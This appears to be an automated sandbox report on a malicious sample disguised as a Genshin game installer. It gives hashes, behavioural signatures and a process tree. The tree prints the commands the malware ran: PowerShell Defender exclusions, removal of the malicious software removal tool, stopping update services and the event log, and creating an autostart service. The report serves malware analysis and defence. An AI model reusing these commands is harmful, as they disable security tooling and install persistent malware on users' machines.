Analysis
-
max time kernel
49s -
max time network
163s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
13-01-2024 13:37
Static task
static1
Behavioral task
behavioral1
Sample
genshin_global.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
genshin_global.exe
Resource
win10v2004-20231215-en
General
-
Target
genshin_global.exe
-
Size
37.9MB
-
MD5
82ebc7d0252a5361d7ca066be6551b93
-
SHA1
8f33fbbdd51b5dc5339c0eb2e414860cf6f04fd9
-
SHA256
bdad3c5e278a03a2f3109b84708819cc6a1f9f02ab1e83f07603f63f9916d6ce
-
SHA512
260777c752cb2d14f7c0f667c81f4a4c9d54331cfe5b574609c073180458bff25f0db1dc81bd4023df32d34a9856ec0f10e6feaf6966a2567aa9fc37f203704b
-
SSDEEP
786432:WQgBUWLP5jxIkTcypX3maertehppms20j17CfCCw6EGLdWiovCah5e7Y:TAUW1FIkwYXWjepmEj1yCDGLdW3aaPek
Malware Config
Signatures
-
Creates new service(s) 1 TTPs
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation genshin_global.exe -
Executes dropped EXE 5 IoCs
pid Process 4036 gn_HypersurrogatesavesDhcp.exe 4940 conhost_gm.exe 4936 svchost.exe 3416 svchost.exe 224 VC_redist.x64.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe conhost_gm.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 4628 genshin_global.exe 4936 svchost.exe 4936 svchost.exe 3416 svchost.exe 3416 svchost.exe -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\WaaSMedicAgent.exe gn_HypersurrogatesavesDhcp.exe File created C:\Program Files (x86)\Adobe\c82b8037eab33d gn_HypersurrogatesavesDhcp.exe File created C:\Program Files (x86)\Windows Sidebar\gn_HypersurrogatesavesDhcp.exe gn_HypersurrogatesavesDhcp.exe File created C:\Program Files (x86)\Windows Sidebar\443c105911989f gn_HypersurrogatesavesDhcp.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\rescache\_merged\3214612860\System.exe gn_HypersurrogatesavesDhcp.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1996 sc.exe 988 sc.exe 2640 sc.exe 3564 sc.exe 4260 sc.exe 2404 sc.exe 3596 sc.exe 4408 sc.exe 4600 sc.exe 1168 sc.exe 4508 sc.exe 1664 sc.exe 4072 sc.exe 1656 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 20 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe 4036 gn_HypersurrogatesavesDhcp.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 4036 gn_HypersurrogatesavesDhcp.exe Token: SeDebugPrivilege 1168 powershell.exe Token: SeDebugPrivilege 4628 powershell.exe Token: SeIncBasePriorityPrivilege 4936 svchost.exe Token: SeShutdownPrivilege 3744 powercfg.exe Token: SeCreatePagefilePrivilege 3744 powercfg.exe Token: SeShutdownPrivilege 3524 powercfg.exe Token: SeCreatePagefilePrivilege 3524 powercfg.exe Token: SeShutdownPrivilege 1944 Process not Found Token: SeCreatePagefilePrivilege 1944 Process not Found Token: SeShutdownPrivilege 2392 powercfg.exe Token: SeCreatePagefilePrivilege 2392 powercfg.exe Token: SeDebugPrivilege 560 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4628 genshin_global.exe -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 4628 wrote to memory of 1168 4628 genshin_global.exe 97 PID 4628 wrote to memory of 1168 4628 genshin_global.exe 97 PID 4628 wrote to memory of 1168 4628 genshin_global.exe 97 PID 4628 wrote to memory of 4036 4628 genshin_global.exe 99 PID 4628 wrote to memory of 4036 4628 genshin_global.exe 99 PID 4628 wrote to memory of 4940 4628 powershell.exe 101 PID 4628 wrote to memory of 4940 4628 powershell.exe 101 PID 4628 wrote to memory of 4936 4628 powershell.exe 102 PID 4628 wrote to memory of 4936 4628 powershell.exe 102 PID 4936 wrote to memory of 3416 4936 svchost.exe 112 PID 4936 wrote to memory of 3416 4936 svchost.exe 112 PID 4444 wrote to memory of 3356 4444 cmd.exe 121 PID 4444 wrote to memory of 3356 4444 cmd.exe 121
Processes
-
C:\Users\Admin\AppData\Local\Temp\genshin_global.exe"C:\Users\Admin\AppData\Local\Temp\genshin_global.exe"1⤵
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAZwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AdABoACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAYwBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAdAB5ACMAPgA="2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1168
-
-
C:\Users\Admin\AppData\Roaming\gn_HypersurrogatesavesDhcp.exe"C:\Users\Admin\AppData\Roaming\gn_HypersurrogatesavesDhcp.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4036
-
-
C:\Users\Admin\AppData\Roaming\conhost_gm.exe"C:\Users\Admin\AppData\Roaming\conhost_gm.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4940 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4628
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
PID:4444 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵PID:3356
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:4260
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3596
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:4408
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:4600
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:1996
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "driverupdate"3⤵
- Launches sc.exe
PID:988
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3524
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3744
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵PID:1944
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2392
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"3⤵
- Launches sc.exe
PID:4072
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "driverupdate"3⤵
- Launches sc.exe
PID:1168
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:2640
-
-
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4936 -
C:\Users\Admin\AppData\Local\Temp\55AD.tmp\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3416
-
-
-
C:\ProgramData\VC_redist.x64.exeC:\ProgramData\VC_redist.x64.exe1⤵
- Executes dropped EXE
PID:224 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:560
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:4508
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:2940
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:4168
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:3564
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:1656
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:1664
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2404
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:384
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵PID:2636
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵PID:2060
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵PID:2624
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵PID:1692
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:3052
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
944B
MD5e8ce785f8ccc6d202d56fefc59764945
SHA1ca032c62ddc5e0f26d84eff9895eb87f14e15960
SHA256d85c19fc6b9d25e2168a2cc50ff38bd226fbf4f02aa7ac038a5f319522d2ffa4
SHA51266460aec4afee582556270f8ee6048d130a090f1c12a2632ed71a99a4073e9931e9e1cc286e32debffb95a90bd955f0f0d6ec891b1c5cd2f0aae41eb6d25832f
-
Filesize
7.6MB
MD58a6134512925ef89b663aa42fcf8e720
SHA1689190dd56413710821a67258cb1819c4f7d9d35
SHA256ff8c358545049a77904553fc15743648a06e9ad7f99266fcf8e351bc4f5bc126
SHA512af35b5986de11f3365f1dacdbc783e95fe8190c854751e63d6c4859aceadfc3a18067c21c5756c7caedce4f75a38dbcfd87def782d4ac8b90b5313d6bbfa2800
-
Filesize
4.5MB
MD5ed0a8db9b0edc40a585222cdb58e8b34
SHA11d68345f0eeaf0c970c2d80d7c6ac6312e33f34e
SHA256269f0e5325b3cf37f115e49ac7ffe854c18d08bb3acf728a45b799fe310acfde
SHA51248eb6da247c0f1a58c26e4fcb0c915d82c406dbb80094c6968da3b2a89677a2b43ebf0c8a69e8c92da646b59315063ed262a41b2efdee4738c1b35edf8bd51c5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.6MB
MD5f3565c6a35f00bb9e50c0d51c905933c
SHA183718dcf9ba0826d31c093016af5e9b6e827b4a4
SHA256a25e14786ea1f3757716220128d1a6acbf5389d1544ac269e04181c220ab3181
SHA5122a537d0fba28d95898a1bb7cfc9016c95703ede80a92c4330cc1de8b5dbda0d96e3662563f3623f4c838e7d5db9a62a124133524a7ee1875f8c8a86420e8bf48
-
Filesize
930KB
MD54c61e306b759b3cef561adfd32658f3f
SHA1644366f2a3f1b893959f232387969b38c8914df1
SHA256896d7b06c8b74e10869c79779bbbcd5a3dfb5612692af5cc9103bea20ba8fb69
SHA51232e886141934be5e2076fed6d5826cbeb0661a22c4882afd5be4dafd4757d7fb313c0ec1f6cbe7fde00b1f50741cc4667be23e936b4b91f28f8768ad4376763e
-
Filesize
192KB
MD5a060c9a41d042006bf8b5d1add27dd95
SHA1d578c5f9c650d677dc19e2997ae04ccd86e6d1a4
SHA256f4aae6c82d501c9cf314019d3a4fa5cb05d7200769203192b3a2b20eff25bfa9
SHA5120cff472f0287d14df042b400209e094f04c20307062425255ae88737badc4c8dab4a73342d5eabff65a0b4dcaa06af61aa2f7484562eba02a1b5b46e3b58fa2d
-
Filesize
448KB
MD5ee0563cb835d63fcc742826cf4955b0a
SHA1e201788a380e64bc8fc552568cfe745361b19adf
SHA2569dba114c2e14356a6f8327731aa0ab131eba5aec9cae0fcd814f3e212eab3a81
SHA51213134f356b86d8e0a9744a8dd03965d592657c3ae58b9f28c9083800ebeae0b618e75ae293907068f600fa1d06864ea3c53637710c8b62981cd36eded7dee432
-
Filesize
256KB
MD58f6529e08334c747b5f3e20894fe6d7c
SHA1e7c177d96ed2bde03d5ef33ac69a2b4a626275a5
SHA2568c52bb0e0247fdb1ea379b08fd640290e4e2af455f1487e9f8a71fc87fcb8d58
SHA512e6c77c150b6c117eeac9e40dc548091470f6df6afa21dedcb3856213cf120e698f985bff94405ef9df987256d5c8e5b09069db6eae85120eab1ebbaa288d0bb0